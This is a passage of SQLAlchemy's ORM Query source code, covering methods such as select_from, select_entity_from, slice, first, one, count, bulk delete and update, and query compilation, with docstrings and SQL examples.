``aliased=True`` feature of the :meth:`~.Query.join`
method. See the example in :meth:`~.Query.join` for how
this is used.
"""
self._reset_joinpoint()
@_generative(_no_clauseelement_condition)
def select_from(self, *from_obj):
r"""Set the FROM clause of this :class:`.Query` explicitly.
:meth:`.Query.select_from` is often used in conjunction with
:meth:`.Query.join` in order to control which entity is selected
from on the "left" side of the join.
The entity or selectable object here effectively replaces the
"left edge" of any calls to :meth:`~.Query.join`, when no
joinpoint is otherwise established - usually, the default "join
point" is the leftmost entity in the :class:`~.Query` object's
list of entities to be selected.
A typical example::
q = session.query(Address).select_from(User).\
join(User.addresses).\
filter(User.name == 'ed')
Which produces SQL equivalent to::
SELECT address.* FROM user
JOIN address ON user.id=address.user_id
WHERE user.name = :name_1
:param \*from_obj: collection of one or more entities to apply
to the FROM clause. Entities can be mapped classes,
:class:`.AliasedClass` objects, :class:`.Mapper` objects
as well as core :class:`.FromClause` elements like subqueries.
.. versionchanged:: 0.9
This method no longer applies the given FROM object
to be the selectable from which matching entities
select from; the :meth:`.select_entity_from` method
now accomplishes this. See that method for a description
of this behavior.
.. seealso::
:meth:`~.Query.join`
:meth:`.Query.select_entity_from`
"""
self._set_select_from(from_obj, False)
@_generative(_no_clauseelement_condition)
def select_entity_from(self, from_obj):
r"""Set the FROM clause of this :class:`.Query` to a
core selectable, applying it as a replacement FROM clause
for corresponding mapped entities.
The :meth:`.Query.select_entity_from` method supplies an alternative
approach to the use case of applying an :func:`.aliased` construct
explicitly throughout a query. Instead of referring to the
:func:`.aliased` construct explicitly,
:meth:`.Query.select_entity_from` automatically *adapts* all occurences
of the entity to the target selectable.
Given a case for :func:`.aliased` such as selecting ``User``
objects from a SELECT statement::
select_stmt = select([User]).where(User.id == 7)
user_alias = aliased(User, select_stmt)
q = session.query(user_alias).\
filter(user_alias.name == 'ed')
Above, we apply the ``user_alias`` object explicitly throughout the
query. When it's not feasible for ``user_alias`` to be referenced
explicitly in many places, :meth:`.Query.select_entity_from` may be
used at the start of the query to adapt the existing ``User`` entity::
q = session.query(User).\
select_entity_from(select_stmt).\
filter(User.name == 'ed')
Above, the generated SQL will show that the ``User`` entity is
adapted to our statement, even in the case of the WHERE clause:
.. sourcecode:: sql
SELECT anon_1.id AS anon_1_id, anon_1.name AS anon_1_name
FROM (SELECT "user".id AS id, "user".name AS name
FROM "user"
WHERE "user".id = :id_1) AS anon_1
WHERE anon_1.name = :name_1
The :meth:`.Query.select_entity_from` method is similar to the
:meth:`.Query.select_from` method, in that it sets the FROM clause
of the query. The difference is that it additionally applies
adaptation to the other parts of the query that refer to the
primary entity. If above we had used :meth:`.Query.select_from`
instead, the SQL generated would have been:
.. sourcecode:: sql
-- uses plain select_from(), not select_entity_from()
SELECT "user".id AS user_id, "user".name AS user_name
FROM "user", (SELECT "user".id AS id, "user".name AS name
FROM "user"
WHERE "user".id = :id_1) AS anon_1
WHERE "user".name = :name_1
To supply textual SQL to the :meth:`.Query.select_entity_from` method,
we can make use of the :func:`.text` construct. However, the
:func:`.text` construct needs to be aligned with the columns of our
entity, which is achieved by making use of the
:meth:`.TextClause.columns` method::
text_stmt = text("select id, name from user").columns(
User.id, User.name)
q = session.query(User).select_entity_from(text_stmt)
:meth:`.Query.select_entity_from` itself accepts an :func:`.aliased`
object, so that the special options of :func:`.aliased` such as
:paramref:`.aliased.adapt_on_names` may be used within the
scope of the :meth:`.Query.select_entity_from` method's adaptation
services. Suppose
a view ``user_view`` also returns rows from ``user``. If
we reflect this view into a :class:`.Table`, this view has no
relationship to the :class:`.Table` to which we are mapped, however
we can use name matching to select from it::
user_view = Table('user_view', metadata,
autoload_with=engine)
user_view_alias = aliased(
User, user_view, adapt_on_names=True)
q = session.query(User).\
select_entity_from(user_view_alias).\
order_by(User.name)
.. versionchanged:: 1.1.7 The :meth:`.Query.select_entity_from`
method now accepts an :func:`.aliased` object as an alternative
to a :class:`.FromClause` object.
:param from_obj: a :class:`.FromClause` object that will replace
the FROM clause of this :class:`.Query`. It also may be an instance
of :func:`.aliased`.
.. seealso::
:meth:`.Query.select_from`
"""
self._set_select_from([from_obj], True)
def __getitem__(self, item):
if isinstance(item, slice):
start, stop, step = util.decode_slice(item)
if isinstance(stop, int) and \
isinstance(start, int) and \
stop - start <= 0:
return []
# perhaps we should execute a count() here so that we
# can still use LIMIT/OFFSET ?
elif (isinstance(start, int) and start < 0) \
or (isinstance(stop, int) and stop < 0):
return list(self)[item]
res = self.slice(start, stop)
if step is not None:
return list(res)[None:None:item.step]
else:
return list(res)
else:
if item == -1:
return list(self)[-1]
else:
return list(self[item:item + 1])[0]
@_generative(_no_statement_condition)
def slice(self, start, stop):
"""Computes the "slice" of the :class:`.Query` represented by
the given indices and returns the resulting :class:`.Query`.
The start and stop indices behave like the argument to Python's
built-in :func:`range` function. This method provides an
alternative to using ``LIMIT``/``OFFSET`` to get a slice of the
query.
For example, ::
session.query(User).order_by(User.id).slice(1, 3)
renders as
.. sourcecode:: sql
SELECT users.id AS users_id,
users.name AS users_name
FROM users ORDER BY users.id
LIMIT ? OFFSET ?
(2, 1)
.. seealso::
:meth:`.Query.limit`
:meth:`.Query.offset`
"""
if start is not None and stop is not None:
self._offset = (self._offset or 0) + start
self._limit = stop - start
elif start is None and stop is not None:
self._limit = stop
elif start is not None and stop is None:
self._offset = (self._offset or 0) + start
if self._offset == 0:
self._offset = None
@_generative(_no_statement_condition)
def limit(self, limit):
"""Apply a ``LIMIT`` to the query and return the newly resulting
``Query``.
"""
self._limit = limit
@_generative(_no_statement_condition)
def offset(self, offset):
"""Apply an ``OFFSET`` to the query and return the newly resulting
``Query``.
"""
self._offset = offset
@_generative(_no_statement_condition)
def distinct(self, *expr):
r"""Apply a ``DISTINCT`` to the query and return the newly resulting
``Query``.
.. note::
The :meth:`.distinct` call includes logic that will automatically
add columns from the ORDER BY of the query to the columns
clause of the SELECT statement, to satisfy the common need
of the database backend that ORDER BY columns be part of the
SELECT list when DISTINCT is used. These columns *are not*
added to the list of columns actually fetched by the
:class:`.Query`, however, so would not affect results.
The columns are passed through when using the
:attr:`.Query.statement` accessor, however.
:param \*expr: optional column expressions. When present,
the PostgreSQL dialect will render a ``DISTINCT ON (<expressions>)``
construct.
"""
if not expr:
self._distinct = True
else:
expr = self._adapt_col_list(expr)
if isinstance(self._distinct, list):
self._distinct += expr
else:
self._distinct = expr
@_generative()
def prefix_with(self, *prefixes):
r"""Apply the prefixes to the query and return the newly resulting
``Query``.
:param \*prefixes: optional prefixes, typically strings,
not using any commas. In particular is useful for MySQL keywords.
e.g.::
query = sess.query(User.name).\
prefix_with('HIGH_PRIORITY').\
prefix_with('SQL_SMALL_RESULT', 'ALL')
Would render::
SELECT HIGH_PRIORITY SQL_SMALL_RESULT ALL users.name AS users_name
FROM users
.. versionadded:: 0.7.7
.. seealso::
:meth:`.HasPrefixes.prefix_with`
"""
if self._prefixes:
self._prefixes += prefixes
else:
self._prefixes = prefixes
@_generative()
def suffix_with(self, *suffixes):
r"""Apply the suffix to the query and return the newly resulting
``Query``.
:param \*suffixes: optional suffixes, typically strings,
not using any commas.
.. versionadded:: 1.0.0
.. seealso::
:meth:`.Query.prefix_with`
:meth:`.HasSuffixes.suffix_with`
"""
if self._suffixes:
self._suffixes += suffixes
else:
self._suffixes = suffixes
def all(self):
"""Return the results represented by this ``Query`` as a list.
This results in an execution of the underlying query.
"""
return list(self)
@_generative(_no_clauseelement_condition)
def from_statement(self, statement):
"""Execute the given SELECT statement and return results.
This method bypasses all internal statement compilation, and the
statement is executed without modification.
The statement is typically either a :func:`~.expression.text`
or :func:`~.expression.select` construct, and should return the set
of columns
appropriate to the entity class represented by this :class:`.Query`.
.. seealso::
:ref:`orm_tutorial_literal_sql` - usage examples in the
ORM tutorial
"""
statement = expression._expression_literal_as_text(statement)
if not isinstance(statement,
(expression.TextClause,
expression.SelectBase)):
raise sa_exc.ArgumentError(
"from_statement accepts text(), select(), "
"and union() objects only.")
self._statement = statement
def first(self):
"""Return the first result of this ``Query`` or
None if the result doesn't contain any row.
first() applies a limit of one within the generated SQL, so that
only one primary entity row is generated on the server side
(note this may consist of multiple result rows if join-loaded
collections are present).
Calling :meth:`.Query.first` results in an execution of the underlying query.
.. seealso::
:meth:`.Query.one`
:meth:`.Query.one_or_none`
"""
if self._statement is not None:
ret = list(self)[0:1]
else:
ret = list(self[0:1])
if len(ret) > 0:
return ret[0]
else:
return None
def one_or_none(self):
"""Return at most one result or raise an exception.
Returns ``None`` if the query selects
no rows. Raises ``sqlalchemy.orm.exc.MultipleResultsFound``
if multiple object identities are returned, or if multiple
rows are returned for a query that returns only scalar values
as opposed to full identity-mapped entities.
Calling :meth:`.Query.one_or_none` results in an execution of the
underlying query.
.. versionadded:: 1.0.9
Added :meth:`.Query.one_or_none`
.. seealso::
:meth:`.Query.first`
:meth:`.Query.one`
"""
ret = list(self)
l = len(ret)
if l == 1:
return ret[0]
elif l == 0:
return None
else:
raise orm_exc.MultipleResultsFound(
"Multiple rows were found for one_or_none()")
def one(self):
"""Return exactly one result or raise an exception.
Raises ``sqlalchemy.orm.exc.NoResultFound`` if the query selects
no rows. Raises ``sqlalchemy.orm.exc.MultipleResultsFound``
if multiple object identities are returned, or if multiple
rows are returned for a query that returns only scalar values
as opposed to full identity-mapped entities.
Calling :meth:`.one` results in an execution of the underlying query.
.. seealso::
:meth:`.Query.first`
:meth:`.Query.one_or_none`
"""
try:
ret = self.one_or_none()
except orm_exc.MultipleResultsFound:
raise orm_exc.MultipleResultsFound(
"Multiple rows were found for one()")
else:
if ret is None:
raise orm_exc.NoResultFound("No row was found for one()")
return ret
def scalar(self):
"""Return the first element of the first result or None
if no rows present. If multiple rows are returned,
raises MultipleResultsFound.
>>> session.query(Item).scalar()
<Item>
>>> session.query(Item.id).scalar()
1
>>> session.query(Item.id).filter(Item.id < 0).scalar()
None
>>> session.query(Item.id, Item.name).scalar()
1
>>> session.query(func.count(Parent.id)).scalar()
20
This results in an execution of the underlying query.
"""
try:
ret = self.one()
if not isinstance(ret, tuple):
return ret
return ret[0]
except orm_exc.NoResultFound:
return None
def __iter__(self):
context = self._compile_context()
context.statement.use_labels = True
if self._autoflush and not self._populate_existing:
self.session._autoflush()
return self._execute_and_instances(context)
def __str__(self):
context = self._compile_context()
try:
bind = self._get_bind_args(
context, self.session.get_bind) if self.session else None
except sa_exc.UnboundExecutionError:
bind = None
return str(context.statement.compile(bind))
def _connection_from_session(self, **kw):
conn = self.session.connection(**kw)
if self._execution_options:
conn = conn.execution_options(**self._execution_options)
return conn
def _execute_and_instances(self, querycontext):
conn = self._get_bind_args(
querycontext,
self._connection_from_session,
close_with_result=True)
result = conn.execute(querycontext.statement, self._params)
return loading.instances(querycontext.query, result, querycontext)
def _get_bind_args(self, querycontext, fn, **kw):
return fn(
mapper=self._bind_mapper(),
clause=querycontext.statement,
**kw
)
@property
def column_descriptions(self):
"""Return metadata about the columns which would be
returned by this :class:`.Query`.
Format is a list of dictionaries::
user_alias = aliased(User, name='user2')
q = sess.query(User, User.id, user_alias)
# this expression:
q.column_descriptions
# would return:
[
{
'name':'User',
'type':User,
'aliased':False,
'expr':User,
'entity': User
},
{
'name':'id',
'type':Integer(),
'aliased':False,
'expr':User.id,
'entity': User
},
{
'name':'user2',
'type':User,
'aliased':True,
'expr':user_alias,
'entity': user_alias
}
]
"""
return [
{
'name': ent._label_name,
'type': ent.type,
'aliased': getattr(insp_ent, 'is_aliased_class', False),
'expr': ent.expr,
'entity':
getattr(insp_ent, "entity", None)
if ent.entity_zero is not None
and not insp_ent.is_clause_element
else None
}
for ent, insp_ent in [
(
_ent,
(inspect(_ent.entity_zero)
if _ent.entity_zero is not None else None)
)
for _ent in self._entities
]
]
def instances(self, cursor, __context=None):
"""Given a ResultProxy cursor as returned by connection.execute(),
return an ORM result as an iterator.
e.g.::
result = engine.execute("select * from users")
for u in session.query(User).instances(result):
print u
"""
context = __context
if context is None:
context = QueryContext(self)
return loading.instances(self, cursor, context)
def merge_result(self, iterator, load=True):
"""Merge a result into this :class:`.Query` object's Session.
Given an iterator returned by a :class:`.Query` of the same structure
as this one, return an identical iterator of results, with all mapped
instances merged into the session using :meth:`.Session.merge`. This
is an optimized method which will merge all mapped instances,
preserving the structure of the result rows and unmapped columns with
less method overhead than that of calling :meth:`.Session.merge`
explicitly for each value.
The structure of the results is determined based on the column list of
this :class:`.Query` - if these do not correspond, unchecked errors
will occur.
The 'load' argument is the same as that of :meth:`.Session.merge`.
For an example of how :meth:`~.Query.merge_result` is used, see
the source code for the example :ref:`examples_caching`, where
:meth:`~.Query.merge_result` is used to efficiently restore state
from a cache back into a target :class:`.Session`.
"""
return loading.merge_result(self, iterator, load)
@property
def _select_args(self):
return {
'limit': self._limit,
'offset': self._offset,
'distinct': self._distinct,
'prefixes': self._prefixes,
'suffixes': self._suffixes,
'group_by': self._group_by or None,
'having': self._having
}
@property
def _should_nest_selectable(self):
kwargs = self._select_args
return (kwargs.get('limit') is not None or
kwargs.get('offset') is not None or
kwargs.get('distinct', False))
def exists(self):
"""A convenience method that turns a query into an EXISTS subquery
of the form EXISTS (SELECT 1 FROM ... WHERE ...).
e.g.::
q = session.query(User).filter(User.name == 'fred')
session.query(q.exists())
Producing SQL similar to::
SELECT EXISTS (
SELECT 1 FROM users WHERE users.name = :name_1
) AS anon_1
The EXISTS construct is usually used in the WHERE clause::
session.query(User.id).filter(q.exists()).scalar()
Note that some databases such as SQL Server don't allow an
EXISTS expression to be present in the columns clause of a
SELECT. To select a simple boolean value based on the exists
as a WHERE, use :func:`.literal`::
from sqlalchemy import literal
session.query(literal(True)).filter(q.exists()).scalar()
.. versionadded:: 0.8.1
"""
# .add_columns() for the case that we are a query().select_from(X),
# so that ".statement" can be produced (#2995) but also without
# omitting the FROM clause from a query(X) (#2818);
# .with_only_columns() after we have a core select() so that
# we get just "SELECT 1" without any entities.
return sql.exists(self.enable_eagerloads(False).add_columns('1').
with_labels().
statement.with_only_columns([1]))
def count(self):
r"""Return a count of rows this Query would return.
This generates the SQL for this Query as follows::
SELECT count(1) AS count_1 FROM (
SELECT <rest of query follows...>
) AS anon_1
.. versionchanged:: 0.7
The above scheme is newly refined as of 0.7b3.
For fine grained control over specific columns
to count, to skip the usage of a subquery or
otherwise control of the FROM clause,
or to use other aggregate functions,
use :attr:`~sqlalchemy.sql.expression.func`
expressions in conjunction
with :meth:`~.Session.query`, i.e.::
from sqlalchemy import func
# count User records, without
# using a subquery.
session.query(func.count(User.id))
# return count of user "id" grouped
# by "name"
session.query(func.count(User.id)).\
group_by(User.name)
from sqlalchemy import distinct
# count distinct "name" values
session.query(func.count(distinct(User.name)))
"""
col = sql.func.count(sql.literal_column('*'))
return self.from_self(col).scalar()
def delete(self, synchronize_session='evaluate'):
r"""Perform a bulk delete query.
Deletes rows matched by this query from the database.
E.g.::
sess.query(User).filter(User.age == 25).\
delete(synchronize_session=False)
sess.query(User).filter(User.age == 25).\
delete(synchronize_session='evaluate')
.. warning:: The :meth:`.Query.delete` method is a "bulk" operation,
which bypasses ORM unit-of-work automation in favor of greater
performance. **Please read all caveats and warnings below.**
:param synchronize_session: chooses the strategy for the removal of
matched objects from the session. Valid values are:
``False`` - don't synchronize the session. This option is the most
efficient and is reliable once the session is expired, which
typically occurs after a commit(), or explicitly using
expire_all(). Before the expiration, objects may still remain in
the session which were in fact deleted which can lead to confusing
results if they are accessed via get() or already loaded
collections.
``'fetch'`` - performs a select query before the delete to find
objects that are matched by the delete query and need to be
removed from the session. Matched objects are removed from the
session.
``'evaluate'`` - Evaluate the query's criteria in Python straight
on the objects in the session. If evaluation of the criteria isn't
implemented, an error is raised.
The expression evaluator currently doesn't account for differing
string collations between the database and Python.
:return: the count of rows matched as returned by the database's
"row count" feature.
.. warning:: **Additional Caveats for bulk query deletes**
* This method does **not work for joined
inheritance mappings**, since the **multiple table
deletes are not supported by SQL** as well as that the
**join condition of an inheritance mapper is not
automatically rendered**. Care must be taken in any
multiple-table delete to first accommodate via some other means
how the related table will be deleted, as well as to
explicitly include the joining
condition between those tables, even in mappings where
this is normally automatic. E.g. if a class ``Engineer``
subclasses ``Employee``, a DELETE against the ``Employee``
table would look like::
session.query(Engineer).\
filter(Engineer.id == Employee.id).\
filter(Employee.name == 'dilbert').\
delete()
However the above SQL will not delete from the Engineer table,
unless an ON DELETE CASCADE rule is established in the database
to handle it.
Short story, **do not use this method for joined inheritance
mappings unless you have taken the additional steps to make
this feasible**.
* The polymorphic identity WHERE criteria is **not** included
for single- or
joined- table updates - this must be added **manually** even
for single table inheritance.
* The method does **not** offer in-Python cascading of
relationships - it is assumed that ON DELETE CASCADE/SET
NULL/etc. is configured for any foreign key references
which require it, otherwise the database may emit an
integrity violation if foreign key references are being
enforced.
After the DELETE, dependent objects in the
:class:`.Session` which were impacted by an ON DELETE
may not contain the current state, or may have been
deleted. This issue is resolved once the
:class:`.Session` is expired, which normally occurs upon
:meth:`.Session.commit` or can be forced by using
:meth:`.Session.expire_all`. Accessing an expired
object whose row has been deleted will invoke a SELECT
to locate the row; when the row is not found, an
:class:`~sqlalchemy.orm.exc.ObjectDeletedError` is
raised.
* The ``'fetch'`` strategy results in an additional
SELECT statement emitted and will significantly reduce
performance.
* The ``'evaluate'`` strategy performs a scan of
all matching objects within the :class:`.Session`; if the
contents of the :class:`.Session` are expired, such as
via a proceeding :meth:`.Session.commit` call, **this will
result in SELECT queries emitted for every matching object**.
* The :meth:`.MapperEvents.before_delete` and
:meth:`.MapperEvents.after_delete`
events **are not invoked** from this method. Instead, the
:meth:`.SessionEvents.after_bulk_delete` method is provided to
act upon a mass DELETE of entity rows.
.. seealso::
:meth:`.Query.update`
:ref:`inserts_and_updates` - Core SQL tutorial
"""
delete_op = persistence.BulkDelete.factory(
self, synchronize_session)
delete_op.exec_()
return delete_op.rowcount
def update(self, values, synchronize_session='evaluate', update_args=None):
r"""Perform a bulk update query.
Updates rows matched by this query in the database.
E.g.::
sess.query(User).filter(User.age == 25).\
update({User.age: User.age - 10}, synchronize_session=False)
sess.query(User).filter(User.age == 25).\
update({"age": User.age - 10}, synchronize_session='evaluate')
.. warning:: The :meth:`.Query.update` method is a "bulk" operation,
which bypasses ORM unit-of-work automation in favor of greater
performance. **Please read all caveats and warnings below.**
:param values: a dictionary with attributes names, or alternatively
mapped attributes or SQL expressions, as keys, and literal
values or sql expressions as values. If :ref:`parameter-ordered
mode <updates_order_parameters>` is desired, the values can be
passed as a list of 2-tuples;
this requires that the :paramref:`~sqlalchemy.sql.expression.update.preserve_parameter_order`
flag is passed to the :paramref:`.Query.update.update_args` dictionary
as well.
.. versionchanged:: 1.0.0 - string names in the values dictionary
are now resolved against the mapped entity; previously, these
strings were passed as literal column names with no mapper-level
translation.
:param synchronize_session: chooses the strategy to update the
attributes on objects in the session. Valid values are:
``False`` - don't synchronize the session. This option is the most
efficient and is reliable once the session is expired, which
typically occurs after a commit(), or explicitly using
expire_all(). Before the expiration, updated objects may still
remain in the session with stale values on their attributes, which
can lead to confusing results.
``'fetch'`` - performs a select query before the update to find
objects that are matched by the update query. The updated
attributes are expired on matched objects.
``'evaluate'`` - Evaluate the Query's criteria in Python straight
on the objects in the session. If evaluation of the criteria isn't
implemented, an exception is raised.
The expression evaluator currently doesn't account for differing
string collations between the database and Python.
:param update_args: Optional dictionary, if present will be passed
to the underlying :func:`.update` construct as the ``**kw`` for
the object. May be used to pass dialect-specific arguments such
as ``mysql_limit``, as well as other special arguments such as
:paramref:`~sqlalchemy.sql.expression.update.preserve_parameter_order`.
.. versionadded:: 1.0.0
:return: the count of rows matched as returned by the database's
"row count" feature.
.. warning:: **Additional Caveats for bulk query updates**
* The method does **not** offer in-Python cascading of
relationships - it is assumed that ON UPDATE CASCADE is
configured for any foreign key references which require
it, otherwise the database may emit an integrity
violation if foreign key references are being enforced.
After the UPDATE, dependent objects in the
:class:`.Session` which were impacted by an ON UPDATE
CASCADE may not contain the current state; this issue is
resolved once the :class:`.Session` is expired, which
normally occurs upon :meth:`.Session.commit` or can be
forced by using :meth:`.Session.expire_all`.
* The ``'fetch'`` strategy results in an additional
SELECT statement emitted and will significantly reduce
performance.
* The ``'evaluate'`` strategy performs a scan of
all matching objects within the :class:`.Session`; if the
contents of the :class:`.Session` are expired, such as
via a proceeding :meth:`.Session.commit` call, **this will
result in SELECT queries emitted for every matching object**.
* The method supports multiple table updates, as detailed
in :ref:`multi_table_updates`, and this behavior does
extend to support updates of joined-inheritance and
other multiple table mappings. However, the **join
condition of an inheritance mapper is not
automatically rendered**. Care must be taken in any
multiple-table update to explicitly include the joining
condition between those tables, even in mappings where
this is normally automatic. E.g. if a class ``Engineer``
subclasses ``Employee``, an UPDATE of the ``Engineer``
local table using criteria against the ``Employee``
local table might look like::
session.query(Engineer).\
filter(Engineer.id == Employee.id).\
filter(Employee.name == 'dilbert').\
update({"engineer_type": "programmer"})
* The polymorphic identity WHERE criteria is **not** included
for single- or
joined- table updates - this must be added **manually**, even
for single table inheritance.
* The :meth:`.MapperEvents.before_update` and
:meth:`.MapperEvents.after_update`
events **are not invoked from this method**. Instead, the
:meth:`.SessionEvents.after_bulk_update` method is provided to
act upon a mass UPDATE of entity rows.
.. seealso::
:meth:`.Query.delete`
:ref:`inserts_and_updates` - Core SQL tutorial
"""
update_args = update_args or {}
update_op = persistence.BulkUpdate.factory(
self, synchronize_session, values, update_args)
update_op.exec_()
return update_op.rowcount
def _compile_context(self, labels=True):
if self.dispatch.before_compile:
for fn in self.dispatch.before_compile:
new_query = fn(self)
if new_query is not None:
self = new_query
context = QueryContext(self)
if context.statement is not None:
return context
context.labels = labels
context._for_update_arg = self._for_update_arg
for entity in self._entities:
entity.setup_context(self, context)
for rec in context.create_eager_joins:
strategy = rec[0]
strategy(*rec[1:])
if context.from_clause:
# "load from explicit FROMs" mode,
# i.e. when select_from() or join() is used
context.froms = list(context.from_clause)
# else "load from discrete FROMs" mode,
# i.e. when each _MappedEntity has its own FROM
if self._enable_single_crit:
self._adjust_for_single_inheritance(context)
if not context.primary_columns:
if self._only_load_props:
raise sa_exc.InvalidRequestError(
"No column-based properties specified for "
"refresh operation. Use session.expire() "
"to reload collections and related items.")
else:
raise sa_exc.InvalidRequestError(
"Query contains no columns with which to "
"SELECT from.")
if context.multi_row_eager_loaders and self._should_nest_selectable:
context.statement = self._compound_eager_statement(context)
else:
context.statement = self._simple_statement(context)
return context
def _compound_eager_statement(self, context):
# for eager joins present and LIMIT/OFFSET/DISTINCT,
# wrap the query inside a select,
# then append eager joins onto that
if context.order_by:
order_by_col_expr = \
sql_util.expand_column_list_from_order_by(
context.primary_columns,
context.order_by
)
else:
context.order_by = None
order_by_col_expr = []
inner = sql.select(
context.primary_columns + order_by_col_expr,
context.whereclause,
from_obj=context.froms,
use_labels=context.labels,
# TODO: this order_by is only needed if
# LIMIT/OFFSET is present in self._select_args,
# else the application on the outside is enough
order_by=context.order_by,
**self._select_args
)
# put FOR UPDATE on the inner query, where MySQL will honor it,
# as well as if it has an OF so Postgresql can use it.
inner._for_update_arg = context._for_update_arg
for hint in self._with_hints:
inner = inner.with_hint(*hint)
if self._correlate:
inner = inner.correlate(*self._correlate)
inner = inner.alias()
equivs = self.__all_equivs()
context.adapter = sql_util.ColumnAdapter(inner, equivs)
statement = sql.select(
[inner] + context.secondary_columns,
use_labels=context.labels)
# Oracle however does not allow FOR UPDATE on the subquery,
# and the Oracle dialect ignores it, plus for Postgresql, MySQL
# we expect that all elements of the row are locked, so also put it
# on the outside (except in the case of PG when OF is used)
if context._for_update_arg is not None and \
context._for_update_arg.of is None:
statement._for_update_arg = context._for_update_arg
from_clause = inner
for eager_join in context.eager_joins.values():
# EagerLoader places a 'stop_on' attribute on the join,
# giving us a marker as to where the "splice point" of
# the join should be
from_clause = sql_util.splice_joins(
from_clause,
eager_join, eager_join.stop_on)
statement.append_from(from_clause)
if context.order_by:
statement.append_order_by(
*context.adapter.copy_and_process(
context.order_by
)
)
statement.append_order_by(*context.eager_order_by)
return statement
def _simple_statement(self, context):
if not context.order_by:
context.order_by = None
if self._distinct is True and context.order_by:
context.primary_columns += \
sql_util.expand_column_list_from_order_by(
context.primary_columns,
context.order_by
)
context.froms += tuple(context.eager_joins.values())
statement = sql.select(
context.primary_columns +
context.secondary_columns,
context.whereclause,
from_obj=context.froms,
use_labels=context.labels,
order_by=context.order_by,
**self._select_args
)
statement._for_update_arg = context._for_update_arg
for hint in self._with_hints:
statement = statement.with_hint(*hint)
if self._correlate:
statement = statement.correlate(*self._correlate)
if context.eager_order_by:
statement.append_order_by(*context.eager_order_by)
return statement
def _adjust_for_single_inheritance(self, context):
"""Apply single-table-inheritance filtering.
For all distinct single-table-inheritance mappers represented in
the columns clause of this query, as well as the "select from entity",
add criterion to the WHERE
clause of the given QueryContext such that only the appropriate
subtypes are selected from the total results.
"""
search = set(self._mapper_adapter_map.values())
if self._select_from_entity and \
self._select_from_entity not in self._mapper_adapter_map:
insp = inspect(self._select_from_entity)
if insp.is_aliased_class:
adapter = insp._adapter
else:
adapter = None
search = search.union([(self._select_from_entity, adapter)])
for (ext_info, adapter) in search:
if ext_info in self._join_entities:
continue
single_crit = ext_info.mapper._single_table_criterion
if single_crit is not None:
if adapter:
single_crit = adapter.traverse(single_crit)
single_crit = self._adapt_clause(single_crit, False, False)
context.whereclause = sql.and_(
sql.True_._ifnone(context.whereclause),
single_crit)
from ..sql.selectable import ForUpdateArg
class LockmodeArg(ForUpdateArg):
@classmethod
def parse_legacy_query(self, mode):
if mode in (None, False):
return None
if mode == "read":
read = True
nowait = False
elif mode == "update":
read = nowait = False
elif mode == "update_nowait":
nowait = True
read = False
else:
raise sa_exc.ArgumentError(
"Unknown with_lockmode argument: %r" % mode)
return LockmodeArg(read=read, nowait=nowait)
class _QueryEntity(object):
"""represent an entity column returned within a Query result."""
def __new__(cls, *args, **kwargs):
if cls is _QueryEntity:
entity = args[1]
if not isinstance(entity, util.string_types) and \
_is_mapped_class(entity):
cls = _MapperEntity
elif isinstance(entity, Bundle):
cls = _BundleEntity
else:
cls = _ColumnEntity
return object.__new__(cls)
def _clone(self):
q = self.__class__.__new__(self.__class__)
q.__dict__ = self.__dict__.copy()
return q
class _MapperEntity(_QueryEntity):
"""mapper/class/AliasedClass entity"""
def __init__(self, query, entity):
if not query._primary_entity:
query._primary_entity = self
query._entities.append(self)
query._has_mapper_entities = True
self.entities = [entity]
self.expr = entity
supports_single_entity = True
use_id_for_hash = True
def setup_entity(self, ext_info, aliased_adapter):
self.mapper = ext_info.mapper
self.aliased_adapter = aliased_adapter
self.selectable = ext_info.selectable
self.is_aliased_class = ext_info.is_aliased_class
self._with_polymorphic = ext_info.with_polymorphic_mappers
self._polymorphic_discriminator = \
ext_info.polymorphic_on
self.entity_zero = ext_info
if ext_info.is_aliased_class:
self._label_name = self.entity_zero.name
else:
self._label_name = self.mapper.class_.__name__
self.path = self.entity_zero._path_registry
def set_with_polymorphic(self, query, cls_or_mappers,
selectable, polymorphic_on):
"""Receive an update from a call to query.with_polymorphic().
Note the newer style of using a free standing with_polymporphic()
construct doesn't make use of this method.
"""
if self.is_aliased_class:
# TODO: invalidrequest ?
raise NotImplementedError(
"Can't use with_polymorphic() against "
"an Aliased object"
)
if cls_or_mappers is None:
query._reset_polymorphic_adapter(self.mapper)
return
mappers, from_obj = self.mapper._with_polymorphic_args(
cls_or_mappers, selectable)
self._with_polymorphic = mappers
self._polymorphic_discriminator = polymorphic_on
self.selectable = from_obj
query._mapper_loads_polymorphically_with(
self.mapper, sql_util.ColumnAdapter(
from_obj, self.mapper._equivalent_columns))
@property
def type(self):
return self.mapper.class_
@property
def entity_zero_or_selectable(self):
return self.entity_zero
def corresponds_to(self, entity):
return _entity_corresponds_to(self.entity_zero, entity)
def adapt_to_selectable(self, query, sel):
query._entities.append(self)
def _get_entity_clauses(self, query, context):
adapter = None
if not self.is_aliased_class:
if query._polymorphic_adapters:
adapter = query._polymorphic_adapters.get(self.mapper, None)
else:
adapter = self.aliased_adapter
if adapter:
if query._from_obj_alias:
ret = adapter.wrap(query._from_obj_alias)
else:
ret = adapter
else:
ret = query._from_obj_alias
return ret
def row_processor(self, query, context, result):
adapter = self._get_entity_clauses(query, context)
if context.adapter and adapter:
adapter = adapter.wrap(context.adapter)
elif not adapter:
adapter = context.adapter
# polymorphic mappers which have concrete tables in
# their hierarchy usually
# require row aliasing unconditionally.
if not adapter and self.mapper._requires_row_aliasing:
adapter = sql_util.ColumnAdapter(
self.selectable,
self.mapper._equivalent_columns)
if query._primary_entity is self:
only_load_props = query._only_load_props
refresh_state = context.refresh_state
else:
only_load_props = refresh_state = None
_instance = loading._instance_processor(
self.mapper,
context,
result,
self.path,
adapter,
only_load_props=only_load_props,
refresh_state=refresh_state,
polymorphic_discriminator=self._polymorphic_discriminator
)
return _instance, self._label_name
def setup_context(self, query, context):
adapter = self._get_entity_clauses(query, context)
# if self._adapted_selectable is None:
context.froms += (self.selectable,)
if context.order_by is False and self.mapper.order_by:
context.order_by = self.mapper.order_by
# apply adaptation to the mapper's order_by if needed.
if adapter:
context.order_by = adapter.adapt_list(
util.to_list(
context.order_by
)
)
loading._setup_entity_query(
context, self.mapper, self,
self.path, adapter, context.primary_columns,
with_polymorphic=self._with_polymorphic,
only_load_props=query._only_load_props,
polymorphic_discriminator=self._polymorphic_discriminator
)
def __str__(self):
return str(self.mapper)
@inspection._self_inspects
class Bundle(InspectionAttr):
"""A grouping of SQL expressions that are returned by a :class:`.Query`
under one namespace.
The :class:`.Bundle` essentially allows nesting of the tuple-based
results returned by a column-oriented :class:`.Query` object. It also
is extensible via simple subclassing, where the primary capability
to override is that of how the set of expressions should be returned,
